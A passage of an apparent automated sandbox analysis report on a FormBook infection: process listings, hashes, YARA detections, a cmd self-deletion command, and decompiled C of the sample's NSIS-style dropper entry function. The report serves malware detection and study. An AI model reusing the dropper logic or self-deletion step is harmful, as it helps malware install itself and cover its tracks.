                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:893608 bytes
                                                                                                                                                                                                            MD5 hash:535DD1329AEF11BF4654B3270F026D5B
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 21%, ReversingLabs
                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:07:16:20
                                                                                                                                                                                                            Start date:27/01/2021
                                                                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:
                                                                                                                                                                                                            Imagebase:0xffca0000
                                                                                                                                                                                                            File size:3229696 bytes
                                                                                                                                                                                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:07:16:32
                                                                                                                                                                                                            Start date:27/01/2021
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\autofmt.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\autofmt.exe
                                                                                                                                                                                                            Imagebase:0x720000
                                                                                                                                                                                                            File size:658944 bytes
                                                                                                                                                                                                            MD5 hash:A475B7BB0CCCFD848AA26075E81D7888
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:07:16:33
                                                                                                                                                                                                            Start date:27/01/2021
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                            Imagebase:0xb60000
                                                                                                                                                                                                            File size:20992 bytes
                                                                                                                                                                                                            MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Start time:07:16:36
                                                                                                                                                                                                            Start date:27/01/2021
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:/c del 'C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe'
                                                                                                                                                                                                            Imagebase:0x4abd0000
                                                                                                                                                                                                            File size:302592 bytes
                                                                                                                                                                                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                            Code Analysis

                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                                                                              			_entry_() {
                                                                                                                                                                                                              				signed int _t42;
                                                                                                                                                                                                              				intOrPtr* _t47;
                                                                                                                                                                                                              				CHAR* _t51;
                                                                                                                                                                                                              				char* _t53;
                                                                                                                                                                                                              				CHAR* _t55;
                                                                                                                                                                                                              				void* _t59;
                                                                                                                                                                                                              				intOrPtr _t61;
                                                                                                                                                                                                              				int _t62;
                                                                                                                                                                                                              				int _t65;
                                                                                                                                                                                                              				signed int _t66;
                                                                                                                                                                                                              				int _t67;
                                                                                                                                                                                                              				signed int _t69;
                                                                                                                                                                                                              				void* _t93;
                                                                                                                                                                                                              				signed int _t109;
                                                                                                                                                                                                              				void* _t112;
                                                                                                                                                                                                              				void* _t117;
                                                                                                                                                                                                              				intOrPtr* _t118;
                                                                                                                                                                                                              				char _t121;
                                                                                                                                                                                                              				signed int _t140;
                                                                                                                                                                                                              				signed int _t141;
                                                                                                                                                                                                              				int _t149;
                                                                                                                                                                                                              				void* _t150;
                                                                                                                                                                                                              				intOrPtr* _t152;
                                                                                                                                                                                                              				CHAR* _t155;
                                                                                                                                                                                                              				CHAR* _t156;
                                                                                                                                                                                                              				void* _t158;
                                                                                                                                                                                                              				char* _t159;
                                                                                                                                                                                                              				void* _t162;
                                                                                                                                                                                                              				void* _t163;
                                                                                                                                                                                                              				char _t188;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				 *(_t163 + 0x18) = 0;
                                                                                                                                                                                                              				 *((intOrPtr*)(_t163 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                                                                                                                                              				 *(_t163 + 0x20) = 0;
                                                                                                                                                                                                              				 *(_t163 + 0x14) = 0x20;
                                                                                                                                                                                                              				SetErrorMode(0x8001); // executed
                                                                                                                                                                                                              				_t42 = GetVersion() & 0xbfffffff;
                                                                                                                                                                                                              				 *0x42474c = _t42;
                                                                                                                                                                                                              				if(_t42 != 6) {
                                                                                                                                                                                                              					_t118 = E00406631(0);
                                                                                                                                                                                                              					if(_t118 != 0) {
                                                                                                                                                                                                              						 *_t118(0xc00);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t155 = "UXTHEME";
                                                                                                                                                                                                              				do {
                                                                                                                                                                                                              					E004065C3(_t155); // executed
                                                                                                                                                                                                              					_t155 =  &(_t155[lstrlenA(_t155) + 1]);
                                                                                                                                                                                                              				} while ( *_t155 != 0);
                                                                                                                                                                                                              				E00406631(0xb);
                                                                                                                                                                                                              				 *0x424744 = E00406631(9);
                                                                                                                                                                                                              				_t47 = E00406631(7);
                                                                                                                                                                                                              				if(_t47 != 0) {
                                                                                                                                                                                                              					_t47 =  *_t47(0x1e);
                                                                                                                                                                                                              					if(_t47 != 0) {
                                                                                                                                                                                                              						 *0x42474f =  *0x42474f | 0x00000040;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				__imp__#17(_t158);
                                                                                                                                                                                                              				__imp__OleInitialize(0); // executed
                                                                                                                                                                                                              				 *0x424818 = _t47;
                                                                                                                                                                                                              				SHGetFileInfoA(0x41fd10, 0, _t163 + 0x38, 0x160, 0); // executed
                                                                                                                                                                                                              				E00406228(0x423f40, "NSIS Error");
                                                                                                                                                                                                              				_t51 = GetCommandLineA();
                                                                                                                                                                                                              				_t159 = "\"C:\\Users\\Public\\vbc.exe\" ";
                                                                                                                                                                                                              				E00406228(_t159, _t51);
                                                                                                                                                                                                              				 *0x424740 = 0x400000;
                                                                                                                                                                                                              				_t53 = _t159;
                                                                                                                                                                                                              				if("\"C:\\Users\\Public\\vbc.exe\" " == 0x22) {
                                                                                                                                                                                                              					 *(_t163 + 0x14) = 0x22;
                                                                                                                                                                                                              					_t53 =  &M0042A001;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t55 = CharNextA(E00405BEB(_t53,  *(_t163 + 0x14)));
                                                                                                                                                                                                              				 *(_t163 + 0x1c) = _t55;
                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                              					_t121 =  *_t55;
                                                                                                                                                                                                              					_t171 = _t121;
                                                                                                                                                                                                              					if(_t121 == 0) {
                                                                                                                                                                                                              						break;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					__eflags = _t121 - 0x20;
                                                                                                                                                                                                              					if(_t121 != 0x20) {
                                                                                                                                                                                                              						L13:
                                                                                                                                                                                                              						__eflags =  *_t55 - 0x22;
                                                                                                                                                                                                              						 *(_t163 + 0x14) = 0x20;
                                                                                                                                                                                                              						if( *_t55 == 0x22) {
                                                                                                                                                                                                              							_t55 =  &(_t55[1]);
                                                                                                                                                                                                              							__eflags = _t55;
                                                                                                                                                                                                              							 *(_t163 + 0x14) = 0x22;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						__eflags =  *_t55 - 0x2f;
                                                                                                                                                                                                              						if( *_t55 != 0x2f) {
                                                                                                                                                                                                              							L25:
                                                                                                                                                                                                              							_t55 = E00405BEB(_t55,  *(_t163 + 0x14));
                                                                                                                                                                                                              							__eflags =  *_t55 - 0x22;
                                                                                                                                                                                                              							if(__eflags == 0) {
                                                                                                                                                                                                              								_t55 =  &(_t55[1]);
                                                                                                                                                                                                              								__eflags = _t55;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							continue;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							_t55 =  &(_t55[1]);
                                                                                                                                                                                                              							__eflags =  *_t55 - 0x53;
                                                                                                                                                                                                              							if( *_t55 != 0x53) {
                                                                                                                                                                                                              								L20:
                                                                                                                                                                                                              								__eflags =  *_t55 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
                                                                                                                                                                                                              								if( *_t55 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
                                                                                                                                                                                                              									L24:
                                                                                                                                                                                                              									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
                                                                                                                                                                                                              									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
                                                                                                                                                                                                              										 *((char*)(_t55 - 2)) = 0;
                                                                                                                                                                                                              										__eflags =  &(_t55[2]);
                                                                                                                                                                                                              										E00406228("C:\\Users\\Albus\\AppData\\Local\\Temp",  &(_t55[2]));
                                                                                                                                                                                                              										L30:
                                                                                                                                                                                                              										_t156 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\";
                                                                                                                                                                                                              										GetTempPathA(0x400, _t156); // executed
                                                                                                                                                                                                              										_t59 = E00403430(_t171);
                                                                                                                                                                                                              										_t172 = _t59;
                                                                                                                                                                                                              										if(_t59 != 0) {
                                                                                                                                                                                                              											L33:
                                                                                                                                                                                                              											DeleteFileA("1033"); // executed
                                                                                                                                                                                                              											_t61 = E00402EF1(_t174,  *(_t163 + 0x20)); // executed
                                                                                                                                                                                                              											 *((intOrPtr*)(_t163 + 0x10)) = _t61;
                                                                                                                                                                                                              											if(_t61 != 0) {
                                                                                                                                                                                                              												L43:
                                                                                                                                                                                                              												ExitProcess(); // executed
                                                                                                                                                                                                              												__imp__OleUninitialize(); // executed
                                                                                                                                                                                                              												_t184 =  *((intOrPtr*)(_t163 + 0x10));
                                                                                                                                                                                                              												if( *((intOrPtr*)(_t163 + 0x10)) == 0) {
                                                                                                                                                                                                              													__eflags =  *0x4247f4;
                                                                                                                                                                                                              													if( *0x4247f4 == 0) {
                                                                                                                                                                                                              														L67:
                                                                                                                                                                                                              														_t62 =  *0x42480c;
                                                                                                                                                                                                              														__eflags = _t62 - 0xffffffff;
                                                                                                                                                                                                              														if(_t62 != 0xffffffff) {
                                                                                                                                                                                                              															 *(_t163 + 0x14) = _t62;
                                                                                                                                                                                                              														}
                                                                                                                                                                                                              														ExitProcess( *(_t163 + 0x14));
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													_t65 = OpenProcessToken(GetCurrentProcess(), 0x28, _t163 + 0x18);
                                                                                                                                                                                                              													__eflags = _t65;
                                                                                                                                                                                                              													_t149 = 2;
                                                                                                                                                                                                              													if(_t65 != 0) {
                                                                                                                                                                                                              														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t163 + 0x24);
                                                                                                                                                                                                              														 *(_t163 + 0x38) = 1;
                                                                                                                                                                                                              														 *(_t163 + 0x44) = _t149;
                                                                                                                                                                                                              														AdjustTokenPrivileges( *(_t163 + 0x2c), 0, _t163 + 0x28, 0, 0, 0);
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													_t66 = E00406631(4);
                                                                                                                                                                                                              													__eflags = _t66;
                                                                                                                                                                                                              													if(_t66 == 0) {
                                                                                                                                                                                                              														L65:
                                                                                                                                                                                                              														_t67 = ExitWindowsEx(_t149, 0x80040002);
                                                                                                                                                                                                              														__eflags = _t67;
                                                                                                                                                                                                              														if(_t67 != 0) {
                                                                                                                                                                                                              															goto L67;
                                                                                                                                                                                                              														}
                                                                                                                                                                                                              														goto L66;
                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                              														_t69 =  *_t66(0, 0, 0, 0x25, 0x80040002);
                                                                                                                                                                                                              														__eflags = _t69;
                                                                                                                                                                                                              														if(_t69 == 0) {
                                                                                                                                                                                                              															L66:
                                                                                                                                                                                                              															E0040140B(9);
                                                                                                                                                                                                              															goto L67;
                                                                                                                                                                                                              														}
                                                                                                                                                                                                              														goto L65;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												E00405944( *((intOrPtr*)(_t163 + 0x10)), 0x200010);
                                                                                                                                                                                                              												ExitProcess(2);
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											if( *0x424760 == 0) {
                                                                                                                                                                                                              												L42:
                                                                                                                                                                                                              												 *0x42480c =  *0x42480c | 0xffffffff;
                                                                                                                                                                                                              												 *(_t163 + 0x18) = E00403A3B( *0x42480c);
                                                                                                                                                                                                              												goto L43;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											_t152 = E00405BEB(_t159, 0);
                                                                                                                                                                                                              											if(_t152 < _t159) {
                                                                                                                                                                                                              												L39:
                                                                                                                                                                                                              												_t181 = _t152 - _t159;
                                                                                                                                                                                                              												 *((intOrPtr*)(_t163 + 0x10)) = "Error launching installer";
                                                                                                                                                                                                              												if(_t152 < _t159) {
                                                                                                                                                                                                              													_t150 = E004058AF(_t184);
                                                                                                                                                                                                              													lstrcatA(_t156, "~nsu");
                                                                                                                                                                                                              													if(_t150 != 0) {
                                                                                                                                                                                                              														lstrcatA(_t156, "A");
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													lstrcatA(_t156, ".tmp");
                                                                                                                                                                                                              													_t161 = "C:\\Users\\Public";
                                                                                                                                                                                                              													if(lstrcmpiA(_t156, "C:\\Users\\Public") != 0) {
                                                                                                                                                                                                              														_push(_t156);
                                                                                                                                                                                                              														if(_t150 == 0) {
                                                                                                                                                                                                              															E00405892();
                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                              															E00405815();
                                                                                                                                                                                                              														}
                                                                                                                                                                                                              														SetCurrentDirectoryA(_t156);
                                                                                                                                                                                                              														_t188 = "C:\\Users\\Albus\\AppData\\Local\\Temp"; // 0x43
                                                                                                                                                                                                              														if(_t188 == 0) {
                                                                                                                                                                                                              															E00406228("C:\\Users\\Albus\\AppData\\Local\\Temp", _t161);
                                                                                                                                                                                                              														}
                                                                                                                                                                                                              														E00406228(0x425000,  *(_t163 + 0x1c));
                                                                                                                                                                                                              														_t136 = "A";
                                                                                                                                                                                                              														_t162 = 0x1a;
                                                                                                                                                                                                              														 *0x425400 = "A";
                                                                                                                                                                                                              														do {
                                                                                                                                                                                                              															E004062BB(0, 0x41f910, _t156, 0x41f910,  *((intOrPtr*)( *0x424754 + 0x120)));
                                                                                                                                                                                                              															DeleteFileA(0x41f910);
                                                                                                                                                                                                              															if( *((intOrPtr*)(_t163 + 0x10)) != 0 && CopyFileA("C:\\Users\\Public\\vbc.exe", 0x41f910, 1) != 0) {
                                                                                                                                                                                                              																E00406007(_t136, 0x41f910, 0);
                                                                                                                                                                                                              																E004062BB(0, 0x41f910, _t156, 0x41f910,  *((intOrPtr*)( *0x424754 + 0x124)));
                                                                                                                                                                                                              																_t93 = E004058C7(0x41f910);
                                                                                                                                                                                                              																if(_t93 != 0) {
                                                                                                                                                                                                              																	CloseHandle(_t93);
                                                                                                                                                                                                              																	 *((intOrPtr*)(_t163 + 0x10)) = 0;
                                                                                                                                                                                                              																}
                                                                                                                                                                                                              															}
                                                                                                                                                                                                              															 *0x425400 =  *0x425400 + 1;
                                                                                                                                                                                                              															_t162 = _t162 - 1;
                                                                                                                                                                                                              														} while (_t162 != 0);
                                                                                                                                                                                                              														E00406007(_t136, _t156, 0);
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													goto L43;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												 *_t152 = 0;
                                                                                                                                                                                                              												_t153 = _t152 + 4;
                                                                                                                                                                                                              												if(E00405CAE(_t181, _t152 + 4) == 0) {
                                                                                                                                                                                                              													goto L43;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												E00406228("C:\\Users\\Albus\\AppData\\Local\\Temp", _t153);
                                                                                                                                                                                                              												E00406228("C:\\Users\\Albus\\AppData\\Local\\Temp\\Nla", _t153);
                                                                                                                                                                                                              												 *((intOrPtr*)(_t163 + 0x10)) = 0;
                                                                                                                                                                                                              												goto L42;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											_t109 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
                                                                                                                                                                                                              											while( *_t152 != _t109) {
                                                                                                                                                                                                              												_t152 = _t152 - 1;
                                                                                                                                                                                                              												if(_t152 >= _t159) {
                                                                                                                                                                                                              													continue;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												goto L39;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											goto L39;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										GetWindowsDirectoryA(_t156, 0x3fb);
                                                                                                                                                                                                              										lstrcatA(_t156, "\\Temp");
                                                                                                                                                                                                              										_t112 = E00403430(_t172);
                                                                                                                                                                                                              										_t173 = _t112;
                                                                                                                                                                                                              										if(_t112 != 0) {
                                                                                                                                                                                                              											goto L33;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										GetTempPathA(0x3fc, _t156);
                                                                                                                                                                                                              										lstrcatA(_t156, "Low");
                                                                                                                                                                                                              										SetEnvironmentVariableA("TEMP", _t156);
                                                                                                                                                                                                              										SetEnvironmentVariableA("TMP", _t156);
                                                                                                                                                                                                              										_t117 = E00403430(_t173);
                                                                                                                                                                                                              										_t174 = _t117;
                                                                                                                                                                                                              										if(_t117 == 0) {
                                                                                                                                                                                                              											goto L43;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										goto L33;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									goto L25;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								_t140 = _t55[4];
                                                                                                                                                                                                              								__eflags = _t140 - 0x20;
                                                                                                                                                                                                              								if(_t140 == 0x20) {
                                                                                                                                                                                                              									L23:
                                                                                                                                                                                                              									_t15 = _t163 + 0x20;
                                                                                                                                                                                                              									 *_t15 =  *(_t163 + 0x20) | 0x00000004;
                                                                                                                                                                                                              									__eflags =  *_t15;
                                                                                                                                                                                                              									goto L24;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__eflags = _t140;
                                                                                                                                                                                                              								if(_t140 != 0) {
                                                                                                                                                                                                              									goto L24;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								goto L23;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t141 = _t55[1];
                                                                                                                                                                                                              							__eflags = _t141 - 0x20;
                                                                                                                                                                                                              							if(_t141 == 0x20) {
                                                                                                                                                                                                              								L19:
                                                                                                                                                                                                              								 *0x424800 = 1;
                                                                                                                                                                                                              								goto L20;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags = _t141;
                                                                                                                                                                                                              							if(_t141 != 0) {
                                                                                                                                                                                                              								goto L20;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							goto L19;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						goto L12;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					do {
                                                                                                                                                                                                              						L12:
                                                                                                                                                                                                              						_t55 =  &(_t55[1]);
                                                                                                                                                                                                              						__eflags =  *_t55 - 0x20;
                                                                                                                                                                                                              					} while ( *_t55 == 0x20);
                                                                                                                                                                                                              					goto L13;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				goto L30;
                                                                                                                                                                                                              			}

































                                                                                                                                                                                                              0x00403471
                                                                                                                                                                                                              0x00403475
                                                                                                                                                                                                              0x0040347d
                                                                                                                                                                                                              0x00403481
                                                                                                                                                                                                              0x00403486
                                                                                                                                                                                                              0x00403492
                                                                                                                                                                                                              0x0040349b
                                                                                                                                                                                                              0x004034a0
                                                                                                                                                                                                              0x004034a3
                                                                                                                                                                                                              0x004034aa
                                                                                                                                                                                                              0x004034b1
                                                                                                                                                                                                              0x004034b1
                                                                                                                                                                                                              0x004034aa
                                                                                                                                                                                                              0x004034b3
                                                                                                                                                                                                              0x004034b8
                                                                                                                                                                                                              0x004034b9
                                                                                                                                                                                                              0x004034c5
                                                                                                                                                                                                              0x004034c9
                                                                                                                                                                                                              0x004034cf
                                                                                                                                                                                                              0x004034dd
                                                                                                                                                                                                              0x004034e2
                                                                                                                                                                                                              0x004034e9
                                                                                                                                                                                                              0x004034ed
                                                                                                                                                                                                              0x004034f1
                                                                                                                                                                                                              0x004034f3
                                                                                                                                                                                                              0x004034f3
                                                                                                                                                                                                              0x004034f1
                                                                                                                                                                                                              0x004034fb
                                                                                                                                                                                                              0x00403502
                                                                                                                                                                                                              0x00403508
                                                                                                                                                                                                              0x0040351e
                                                                                                                                                                                                              0x0040352e
                                                                                                                                                                                                              0x00403533
                                                                                                                                                                                                              0x00403539
                                                                                                                                                                                                              0x00403540
                                                                                                                                                                                                              0x0040354c
                                                                                                                                                                                                              0x00403556
                                                                                                                                                                                                              0x00403558
                                                                                                                                                                                                              0x0040355a
                                                                                                                                                                                                              0x0040355f
                                                                                                                                                                                                              0x0040355f
                                                                                                                                                                                                              0x0040356f
                                                                                                                                                                                                              0x00403575
                                                                                                                                                                                                              0x0040363e
                                                                                                                                                                                                              0x0040363e
                                                                                                                                                                                                              0x00403640
                                                                                                                                                                                                              0x00403642
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040357e
                                                                                                                                                                                                              0x00403581
                                                                                                                                                                                                              0x00403589
                                                                                                                                                                                                              0x00403589
                                                                                                                                                                                                              0x0040358c
                                                                                                                                                                                                              0x00403591
                                                                                                                                                                                                              0x00403593
                                                                                                                                                                                                              0x00403593
                                                                                                                                                                                                              0x00403594
                                                                                                                                                                                                              0x00403594
                                                                                                                                                                                                              0x00403599
                                                                                                                                                                                                              0x0040359c
                                                                                                                                                                                                              0x0040362e
                                                                                                                                                                                                              0x00403633
                                                                                                                                                                                                              0x00403638
                                                                                                                                                                                                              0x0040363b
                                                                                                                                                                                                              0x0040363d
                                                                                                                                                                                                              0x0040363d
                                                                                                                                                                                                              0x0040363d
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004035a2
                                                                                                                                                                                                              0x004035a2
                                                                                                                                                                                                              0x004035a3
                                                                                                                                                                                                              0x004035a6
                                                                                                                                                                                                              0x004035be
                                                                                                                                                                                                              0x004035e9
                                                                                                                                                                                                              0x004035eb
                                                                                                                                                                                                              0x004035fe
                                                                                                                                                                                                              0x00403629
                                                                                                                                                                                                              0x0040362c
                                                                                                                                                                                                              0x0040364a
                                                                                                                                                                                                              0x0040364d
                                                                                                                                                                                                              0x00403656
                                                                                                                                                                                                              0x0040365b
                                                                                                                                                                                                              0x00403661
                                                                                                                                                                                                              0x0040366c
                                                                                                                                                                                                              0x0040366e
                                                                                                                                                                                                              0x00403673
                                                                                                                                                                                                              0x00403675
                                                                                                                                                                                                              0x004036cd
                                                                                                                                                                                                              0x004036d2
                                                                                                                                                                                                              0x004036dc
                                                                                                                                                                                                              0x004036e3
                                                                                                                                                                                                              0x004036e7
                                                                                                                                                                                                              0x0040377b
                                                                                                                                                                                                              0x0040377b
                                                                                                                                                                                                              0x00403780
                                                                                                                                                                                                              0x00403786
                                                                                                                                                                                                              0x0040378b
                                                                                                                                                                                                              0x004038af
                                                                                                                                                                                                              0x004038b5
                                                                                                                                                                                                              0x00403931
                                                                                                                                                                                                              0x00403931
                                                                                                                                                                                                              0x00403936
                                                                                                                                                                                                              0x00403939
                                                                                                                                                                                                              0x0040393b
                                                                                                                                                                                                              0x0040393b
                                                                                                                                                                                                              0x00403943
                                                                                                                                                                                                              0x00403943
                                                                                                                                                                                                              0x004038c5
                                                                                                                                                                                                              0x004038cd
                                                                                                                                                                                                              0x004038cf
                                                                                                                                                                                                              0x004038d0
                                                                                                                                                                                                              0x004038dd
                                                                                                                                                                                                              0x004038f0
                                                                                                                                                                                                              0x004038f8
                                                                                                                                                                                                              0x004038fc
                                                                                                                                                                                                              0x004038fc
                                                                                                                                                                                                              0x00403904
                                                                                                                                                                                                              0x00403909
                                                                                                                                                                                                              0x00403910
                                                                                                                                                                                                              0x0040391e
                                                                                                                                                                                                              0x00403920
                                                                                                                                                                                                              0x00403926
                                                                                                                                                                                                              0x00403928
